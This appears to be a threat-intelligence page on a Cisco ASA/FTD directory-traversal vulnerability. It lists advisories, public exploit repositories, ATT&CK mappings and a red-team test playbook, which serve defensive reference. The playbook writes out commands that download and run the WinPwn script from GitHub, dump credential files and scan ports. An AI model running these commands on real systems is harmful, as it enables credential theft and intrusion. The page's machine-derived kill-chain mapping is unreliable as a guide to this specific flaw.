CVE-2020-3452

HIGH CISA KEV EXPLOIT POC TTE 1d Pub 22/07 Upd 21/10

Overview

This vulnerability is a directory traversal flaw in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software. It arises from insufficient input validation of URLs in HTTP requests processed by the affected devices. The flaw specifically impacts the web services file system component, which is enabled when WebVPN or AnyConnect features are configured on the device.

Vulnerability Description

A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and read sensitive files on a targeted system. The vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device. The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files.

Impact

An unauthenticated remote attacker can exploit this vulnerability to read sensitive files stored within the web services file system of the targeted device. No authentication or user interaction is required to perform the directory traversal attack. The exposed files may contain confidential configuration data or user information, potentially leading to information disclosure and aiding further attacks against the network perimeter. However, system or underlying OS files remain inaccessible, limiting the scope to file disclosure within the web services context.

Solution

Cisco has released security updates for Adaptive Security Appliance (ASA) Software and Firepower Threat Defense (FTD) Software addressing this vulnerability. Administrators should apply the patches as detailed in the Cisco Security Advisory available at https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86. The advisory contains version-specific fixes and recommended upgrade paths. No alternative workarounds are provided; timely patching is the primary mitigation step.

EPSS vs KEV Prediction — Evolution (30 days)

Full Analysis

A significant vulnerability exists within the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software, primarily due to inadequate input validation of URLs in HTTP requests. This flaw allows an unauthenticated remote attacker to perform directory traversal attacks, enabling them to access sensitive files on the targeted system. The vulnerability arises when crafted HTTP requests containing directory traversal character sequences are processed by the affected devices. Specifically, this issue is prevalent when the web services file system is enabled through configurations such as WebVPN or AnyConnect features, which are commonly utilized for secure remote access.

The attack vector for this vulnerability is relatively straightforward. An attacker can exploit the flaw by sending a specially crafted HTTP request to the affected device, which could lead to unauthorized access to arbitrary files within the web services file system. Although the vulnerability does not permit access to critical ASA or FTD system files or the underlying operating system files, the ability to read sensitive files could still provide attackers with valuable information. This could include configuration files, user data, or other sensitive information that could be leveraged for further attacks or to gain a foothold within the network.

The real-world impact of this vulnerability can be substantial, particularly for organizations relying on Cisco's security appliances to protect their networks. Successful exploitation could lead to data breaches, loss of sensitive information, and potential regulatory repercussions depending on the nature of the data accessed. Furthermore, the business risk extends beyond immediate data loss; it includes reputational damage, loss of customer trust, and financial implications associated with incident response and remediation efforts. Organizations that fail to address this vulnerability may find themselves at a heightened risk of subsequent attacks, as the information obtained could facilitate more sophisticated intrusion attempts.

To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. Regularly updating and patching affected Cisco devices is crucial, as vendors typically release security updates to address known vulnerabilities. Additionally, organizations should employ intrusion detection systems (IDS) and web application firewalls (WAF) to monitor and filter HTTP requests for suspicious patterns indicative of directory traversal attempts. Conducting routine security audits and penetration testing can also help identify potential weaknesses in the configuration and deployment of Cisco ASA and FTD devices, ensuring that security best practices are followed.

In conclusion, the vulnerability in the web services interface of Cisco's security appliances poses a significant threat to organizations that utilize these systems. The potential for unauthorized access to sensitive files highlights the importance of robust input validation and the need for proactive security measures. By understanding the technical details, attack vectors, and real-world implications of this vulnerability, organizations can better prepare themselves to defend against potential exploits and safeguard their critical assets.




CSURFACE threat intelligence has detected a notable surge in exploitation attempts targeting the directory traversal vulnerability in Cisco ASA and Firepower Threat Defense software. Our telemetry indicates an increased frequency of crafted HTTP requests designed to exploit this flaw, reflecting heightened attacker interest. Concurrently, the availability of multiple new proof-of-concept tools on public repositories has lowered the barrier for adversaries to conduct reconnaissance and exploitation activities. Although the EPSS score remains high and stable, this uptick in observed activity underscores a growing operational focus on this vulnerability within the threat landscape. For defenders, this escalation signals an elevated risk of unauthorized access to sensitive system files, potentially enabling further lateral movement or data exfiltration. Consequently, the threat level associated with CVE-2020-3452 should be considered elevated, warranting increased vigilance and monitoring despite the absence of confirmed ransomware linkage at this time.



Update 2 — May 15, 2026

CSURFACE threat intelligence has detected a slight increase in activity exploiting CVE-2020-3452, reflected by a modest rise in telemetry indicators despite a marginal decline in the EPSS score. This subtle uptick suggests continued adversary interest and operational use of this vulnerability, supported by the sustained availability of multiple proof-of-concept tools in public repositories. While the overall exploit momentum remains steady rather than rapidly accelerating, the persistence of scanning and exploitation attempts signals that threat actors maintain this vulnerability as a viable vector for unauthorized access. For defenders, this ongoing activity underscores the necessity of maintaining heightened monitoring and response capabilities, as even incremental increases in exploitation attempts can presage more targeted or sophisticated campaigns. Consequently, the threat level associated with CVE-2020-3452 should be regarded as persistently elevated, reflecting sustained adversary engagement rather than a transient spike.



Update 3 — May 23, 2026

CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2020-3452, accompanied by the emergence of new proof-of-concept tools that enhance attacker capabilities. Our telemetry indicates that adversaries are increasingly leveraging automated scanners and exploit frameworks, broadening the attack surface and lowering the technical barrier for exploitation. This development is significant because it suggests sustained and potentially more effective adversary engagement, increasing the likelihood of successful unauthorized access via directory traversal on vulnerable Cisco ASA and FTD devices. Although the overall exploitation trend remains steady rather than rapidly accelerating, the proliferation of accessible exploit tools amplifies the risk by enabling a wider range of threat actors, including less sophisticated ones, to exploit this vulnerability. Consequently, the threat level associated with CVE-2020-3452 should be considered persistently high, reflecting ongoing adversary interest and expanding exploitation capabilities that maintain this vulnerability as a viable attack vector.



Update 4 — June 07, 2026

CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2020-3452, reflected by a significant uptick in detection activity across our sensors. This surge coincides with the continued availability and diversification of publicly accessible proof-of-concept exploit tools, which have lowered the technical barrier for threat actors to leverage this directory traversal vulnerability. Although the EPSS score remains stable at a high percentile, the increased exploitation frequency signals sustained adversary interest and operational momentum. For defenders, this development underscores the persistent risk posed by this vulnerability, as a broader spectrum of attackers—including less sophisticated actors—can now more readily conduct reconnaissance and unauthorized data access on vulnerable Cisco ASA and FTD devices. Consequently, the threat level associated with CVE-2020-3452 should be reassessed as elevated, reflecting both the intensifying exploitation activity and the expanding toolkit facilitating these attacks.

Affected Products (12)

Vendor Product Version CPE
cisco Cisco Adaptive Security Appliance Software All cpe:2.3:o:cisco:adaptive_security_appliance_software:*:*:*:*:*:*:*:*
cisco Cisco Adaptive Security Appliance Software All cpe:2.3:o:cisco:adaptive_security_appliance_software:*:*:*:*:*:*:*:*
cisco Cisco Adaptive Security Appliance Software All cpe:2.3:o:cisco:adaptive_security_appliance_software:*:*:*:*:*:*:*:*
cisco Cisco Adaptive Security Appliance Software All cpe:2.3:o:cisco:adaptive_security_appliance_software:*:*:*:*:*:*:*:*
cisco Cisco Adaptive Security Appliance Software All cpe:2.3:o:cisco:adaptive_security_appliance_software:*:*:*:*:*:*:*:*
cisco Cisco Adaptive Security Appliance Software All cpe:2.3:o:cisco:adaptive_security_appliance_software:*:*:*:*:*:*:*:*
cisco Cisco Adaptive Security Appliance Software All cpe:2.3:o:cisco:adaptive_security_appliance_software:*:*:*:*:*:*:*:*
cisco Cisco Firepower Threat Defense All cpe:2.3:a:cisco:firepower_threat_defense:*:*:*:*:*:*:*:*
cisco Cisco Firepower Threat Defense All cpe:2.3:a:cisco:firepower_threat_defense:*:*:*:*:*:*:*:*
cisco Cisco Firepower Threat Defense All cpe:2.3:a:cisco:firepower_threat_defense:*:*:*:*:*:*:*:*
cisco Cisco Firepower Threat Defense All cpe:2.3:a:cisco:firepower_threat_defense:*:*:*:*:*:*:*:*
cisco Cisco Firepower Threat Defense All cpe:2.3:a:cisco:firepower_threat_defense:*:*:*:*:*:*:*:*
Warning: The exploits and proof-of-concept (PoC) code listed below are sourced from third-party public repositories. CSURFACE assumes no responsibility for the content, accuracy, or safety of these resources. Use at your own risk. Learn more

ExploitDB (3)

Title Author Type Platform Date Link
Cisco ASA and FTD 9.6.4.42 - Path Traversal 3ndG4me webapps hardware - View
Cisco ASA 9.14.1.10 and FTD 6.6.0.1 - Path Traversal (2) Freakyclown webapps hardware - View
Cisco Adaptive Security Appliance Software 9.11 - Local File Inclusion 0xmmnbassel webapps hardware - View

GitHub PoCs (23)

Repository Author Stars Forks Date Link
darklotuskdb/CISCO-CVE-2020-3452-Scanner-Exploiter
CISCO CVE-2020-3452 Scanner & Exploiter
darklotuskdb 99 26 2021-01-05 View
3ndG4me/CVE-2020-3452-Exploit
Just basic scanner abusing CVE-2020-3452 to enumerate the standard files accessible in the Web Directory of the CISCO AS...
3ndG4me 24 13 2020-09-28 View
cygenta/CVE-2020-3452
cygenta 26 9 2020-12-13 View
PR3R00T/CVE-2020-3452-Cisco-Scanner
CVE-2020-3452 Cisco ASA Scanner -unauth Path Traversal Check
PR3R00T 25 6 2020-07-24 View
0x5ECF4ULT/CVE-2020-3452
CVE-2020-3452 exploit
0x5ECF4ULT 24 5 2020-08-01 View
murataydemir/CVE-2020-3452
[CVE-2020-3452] Cisco Adaptive Security Appliance (ASA) & Cisco Firepower Threat Defense (FTD) Web Service Read-Only Dir...
murataydemir 7 6 2020-08-13 View
fuzzlove/Cisco-ASA-FTD-Web-Services-Traversal
CVE-2020-3452 - Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) traversal
fuzzlove 6 2 2021-02-03 View
grim3/CVE-2020-3452
CVE-2020-3452
grim3 4 3 2020-11-18 View
foulenzer/CVE-2020-3452
Little, stupid python validator(?) for CVE-2020-3452 on CISCO devices.
foulenzer 3 1 2020-07-25 View
Gh0st0ne/http-vuln-cve2020-3452.nse
CVE-2020-3452 : Cisco ASA and FTD Unauthorized Remote File Reading Nmap NSE Script
Gh0st0ne 0 4 2020-07-29 View
faisalfs10x/Cisco-CVE-2020-3452-shodan-scanner
simple bash script of CVE-2020-3452 Cisco ASA / Firepower Read-Only Path Traversal Vulnerability checker
faisalfs10x 2 2 2021-02-04 View
mr-r3b00t/CVE-2020-3452
mr-r3b00t 0 3 2020-07-24 View
Loneyers/cve-2020-3452
unauth file read in cisco asa & firepower.
Loneyers 2 0 2020-07-24 View
XDev05/CVE-2020-3452-PoC
XDev05 2 0 2020-07-24 View
paran0id34/CVE-2020-3452
CVE-2020-3452 - directory traversal in Cisco ASA and Cisco Firepower Threat Defense
paran0id34 1 0 2020-08-03 View
ludy-dev/Cisco-ASA-LFI
(CVE-2020-3452) Cisco Adaptive Security Appliance Software - Local File Inclusion Vuln Test sciript
ludy-dev 1 0 2020-08-31 View
Cappricio-Securities/CVE-2020-3452
Cisco Adaptive Security Appliance (ASA)/Firepower Threat Defense (FTD) - Local File Inclusion
Cappricio-Securities 1 0 2024-05-25 View
Aviksaikat/CVE-2020-3452
Test vulnerability of CVE-2020-3452
Aviksaikat 1 0 2021-11-03 View
curtishoughton/CVE-2020-3452-Cisco-Python-Scanner
Safe Python scanner for CVE-2020-3452 (Cisco ASA/FTD WebVPN Directory Traversal)
curtishoughton 0 0 2026-05-16 View
abrewer251/CVE-2020-3452_Cisco_ASA_PathTraversal
Proof-of-concept script for CVE-2020-3452 — Cisco ASA/FTD Path Traversal vulnerability. Supports automated extraction of...
abrewer251 0 0 2025-09-23 View
Veids/CVE-2020-3452_auto
Veids 0 0 2022-01-10 View
iveresk/cve-2020-3452
Just proof of concept for Cisco CVE-2020-3452. Using external or internal file base.
iveresk 0 0 2022-05-07 View
sujaygr8/CVE-2020-3452
sujaygr8 0 0 2021-06-10 View
Exploited in Wild CONFIRMED
Ransomware NOT ASSOCIATED
Attacker Interest MEDIUM
Sightings Few sightings

Threat Feed

33 events
2026-07-10
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-09
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-08
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-06
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-05
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-04
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-02
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-01
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-30
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-29
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-28
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-23
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-19
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-17
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-05
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-04
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-03
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-02
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-01
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-31
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-30
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-29
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-28
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-27
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-26
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-25
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-24
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-19
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-18
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-17
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2021-11-03
Added to CISA KEV Catalog

CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog

2020-07-24
PoC Published (23 GitHub repositories)

Proof-of-concept code is publicly available for this vulnerability

Exploit Published (3 ExploitDB, 0 Metasploit)

Public exploit code is available for this vulnerability

Likely Kill Chain

Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.

Applicable Out of scope
Initial Access
TA0001
Execution
TA0002
Persistence
TA0003
Priv. Escalation
TA0004
Defense Evasion
TA0005
Credential Access
TA0006
Lateral Movement
TA0008
Collection
TA0009
Impact
TA0040

Kill chain derived from the ML classifier.

Attack Vectors ML

Path Traversal
100% path_traversal
Improper Input Validation
58% input_validation

MITRE ATT&CK Techniques (6)

The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.

ID Name Stage Tactics Platforms Link
T1190 Exploit Public-Facing Application Initial Access initial-access Containers, ESXi, IaaS, Linux, macOS, Network Devices, Windows
T1059 Command and Scripting Interpreter Kill Chain execution ESXi, IaaS, Identity Provider, Linux, macOS, Network Devices, Office Suite, Windows
T1542.001 System Firmware Kill Chain persistence, defense-evasion Windows, Network Devices
T1552.001 Credentials In Files Kill Chain credential-access Containers, IaaS, Linux, macOS, Windows
T1046 Network Service Discovery Kill Chain discovery Containers, IaaS, Linux, macOS, Network Devices, Windows
T1021.004 SSH Kill Chain lateral-movement ESXi, Linux, macOS

CAPEC Attack Patterns ML

ID Name ML Conf. Likelihood Severity Link
CAPEC-126 Path Traversal
48%
High Very High
CAPEC-79 Using Slashes in Alternate Encoding
45%
High High
CAPEC-78 Using Escaped Slashes in Alternate Encoding
40%
High High
CAPEC-64 Using Slashes and URL Encoding Combined to Bypass Validation Logic
39%
High High
CAPEC-76 Manipulating Web Input to File System Calls
37%
High Very High

Red Team Playbook

33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.

T1021.004 ESXi - Enable SSH via PowerCLI Windows PowerShell Privileged
An adversary enables the SSH service on a ESXi host to maintain persistent access to the host and to carryout subsequent operations.
Command (PowerShell)
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false 
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
T1021.004 ESXi - Enable SSH via VIM-CMD Windows CMD
An adversary enables SSH on an ESXi host to maintain persistence and creeate another command execution interface. [Reference](https://lolesxi-project.github.io/LOLESXi/lolesxi/Binaries/vim-cmd/#enable%20service)
Command (CMD)
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
T1046 Network Service Discovery for Containers containers Shell
Attackers may try to obtain a list of services that are operating on remote hosts and local network infrastructure devices, in order to identify potential vulnerabilities that can be exploited through remote software attacks. They typically use tools to conduct port and...
Command (Shell)
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
T1046 Port Scan Linux, macOS Bash
Scan ports to check for listening ports. Upon successful execution, sh will perform a network connection against a single host (192.168.1.1) and determine what ports are open in the range of 1-65535. Results will be via stdout.
Command (Bash)
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
T1046 Port Scan NMap for Windows Windows PowerShell Privileged
Scan ports to check for listening ports for the local host 127.0.0.1
Command (PowerShell)
nmap #{host_to_scan}
T1046 Port Scan Nmap Linux, macOS Shell Privileged
Scan ports to check for listening ports with Nmap. Upon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of addresses on port 80 to determine if listening. Results will be via stdout.
Command (Shell)
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
T1046 Port Scan using nmap (Port range) Linux, macOS Shell Privileged
Scan multiple ports to check for listening ports with nmap
Command (Shell)
nmap -Pn -sV -p #{port_range} #{host}
T1046 Port Scan using python Windows PowerShell
Scan ports to check for listening ports with python
Command (PowerShell)
python "#{filename}" -i #{host_ip}
T1046 Port-Scanning /24 Subnet with PowerShell Windows PowerShell
Scanning common ports in a /24 subnet. If no IP address for the target subnet is specified the test tries to determine the attacking machine's "primary" IPv4 address first and then scans that address with a /24 netmask. The connection attempts to use a timeout parameter in...
Command (PowerShell)
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
    $ip_list = $ipAddr -split ","
    $ip_list = $ip_list.ForEach({ $_.Trim() })
    Write-Host "[i] IP Address List: $ip_list"

    $ports = #{port_list}

    foreach ($ip in $ip_list) {
        foreach ($port in $ports) {
            Write-Host "[i] Establishing connection to: $ip : $port"
            try {
                $tcp = New-Object Net.Sockets.TcpClient
                $tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
            } catch {}
            if ($tcp.Connected) {
                $tcp.Close()
                Write-Host "Port $port is open on $ip"
            }
        }
    }
} elseif ($ipAddr -notlike "*,*") {
    if ($ipAddr -eq "") {
        # Assumes the "primary" interface is shown at the top
        $interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
        Write-Host "[i] Using Interface $interface"
        $ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
    }
    Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
    $subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
    # Always assumes /24 subnet
    Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"

    $ports = #{port_list}
    $subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }

    foreach ($ip in $subnetIPs) {
        foreach ($port in $ports) {
            try {
                $tcp = New-Object Net.Sockets.TcpClient
                $tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
            } catch {}
            if ($tcp.Connected) {
                $tcp.Close()
                Write-Host "Port $port is open on $ip"
            }
        }
    }
} else {
    Write-Host "[Error] Invalid Inputs"
    exit 1
}
T1046 Remote Desktop Services Discovery via PowerShell Windows PowerShell Privileged
Availability of remote desktop services can be checked using get- cmdlet of PowerShell
Command (PowerShell)
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
T1046 WinPwn - MS17-10 Windows PowerShell
Search for MS17-10 vulnerable Windows Servers in the domain using powerSQL function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
T1046 WinPwn - bluekeep Windows PowerShell
Search for bluekeep vulnerable Windows Systems in the domain using bluekeep function of WinPwn. Can take many minutes to complete (~600 seconds in testing on a small domain).
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
T1046 WinPwn - fruit Windows PowerShell
Search for potentially vulnerable web apps (low hanging fruits) using fruit function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
T1046 WinPwn - spoolvulnscan Windows PowerShell
Start MS-RPRN RPC Service Scan using spoolvulnscan function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
T1059 AutoIt Script Execution Windows PowerShell
An adversary may attempt to execute suspicious or malicious script using AutoIt software instead of regular terminal like powershell or cmd. Calculator will popup when the script is executed successfully.
Command (PowerShell)
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
T1542.001 UEFI Persistence via Wpbbin.exe File Creation Windows PowerShell Privileged
Creates Wpbbin.exe in %systemroot%. This technique can be used for UEFI-based pre-OS boot persistence mechanisms. - https://grzegorztworek.medium.com/using-uefi-to-inject-executable-files-into-bitlocker-protected-drives-8ff4ca59c94c -...
Command (PowerShell)
echo "Creating %systemroot%\wpbbin.exe"      
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
T1552.001 Access unattend.xml Windows CMD Privileged
Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored. If these files exist, their contents will be displayed. They are used to store credentials/answers during the unattended windows install process.
Command (CMD)
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
T1552.001 Extract Browser and System credentials with LaZagne macOS Bash Privileged
[LaZagne Source](https://github.com/AlessandroZ/LaZagne)
Command (Bash)
python2 laZagne.py all
T1552.001 Extract passwords with grep Linux, macOS Shell
Extracting credentials from files
Command (Shell)
grep -ri password #{file_path}
exit 0
T1552.001 Extracting passwords with findstr Windows PowerShell
Extracting Credentials from Files. Upon execution, the contents of files that contain the word "password" will be displayed.
Command (PowerShell)
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
T1552.001 Find AWS credentials Linux, macOS Shell
Find local AWS credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
T1552.001 Find Azure credentials Linux, macOS Shell
Find local Azure credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
T1552.001 Find GCP credentials Linux, macOS Shell
Find local Google Cloud Platform credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
T1552.001 Find OCI credentials Linux, macOS Shell
Find local Oracle cloud credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
T1552.001 Find and Access Github Credentials Linux, macOS Bash
This test looks for .netrc files (which stores github credentials in clear text )and dumps its contents if found.
Command (Bash)
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
T1552.001 List Credential Files via Command Prompt Windows CMD Privileged
Via Command Prompt,list files where credentials are stored in Windows Credential Manager
Command (CMD)
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
T1552.001 List Credential Files via PowerShell Windows PowerShell Privileged
Via PowerShell,list files where credentials are stored in Windows Credential Manager
Command (PowerShell)
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
T1552.001 WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials Windows PowerShell
Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials technique via function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive  
T1552.001 WinPwn - SessionGopher Windows PowerShell
Launches SessionGopher on this system via WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
T1552.001 WinPwn - Snaffler Windows PowerShell
Check Domain Network-Shares for cleartext passwords using Snaffler function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
T1552.001 WinPwn - passhunt Windows PowerShell
Search for Passwords on this system using passhunt via WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
T1552.001 WinPwn - powershellsensitive Windows PowerShell
Check Powershell event logs for credentials or other sensitive information via winpwn powershellsensitive function.
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
T1552.001 WinPwn - sensitivefiles Windows PowerShell
Search for sensitive files on this local system using the SensitiveFiles function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput

Detection & Response Rules

No detection or response rules found for this CVE.

No news articles found for this CVE.

References (7)

Title Tags URL
nvd.nist.gov
NVD reference
https://nvd.nist.gov/vuln/detail/CVE-2020-3452
tools.cisco.com
GitHub CVE vendor-advisory x_refsource_CISCO
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86
packetstormsecurity.com
GitHub CVE x_refsource_MISC
http://packetstormsecurity.com/files/158646/Cisco-ASA-FTD-Remote-File-Disclosure.html
packetstormsecurity.com
GitHub CVE x_refsource_MISC
http://packetstormsecurity.com/files/158647/Cisco-Adaptive-Security-Appliance-Software-9.11-Local-File-Inclusion.html
packetstormsecurity.com
GitHub CVE x_refsource_MISC
http://packetstormsecurity.com/files/159523/Cisco-ASA-FTD-9.6.4.42-Path-Traversal.html
packetstormsecurity.com
GitHub CVE x_refsource_MISC
http://packetstormsecurity.com/files/160497/Cisco-ASA-9.14.1.10-FTD-6.6.0.1-Path-Traversal.html
cisa.gov
NVD API US Government Resource
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2020-3452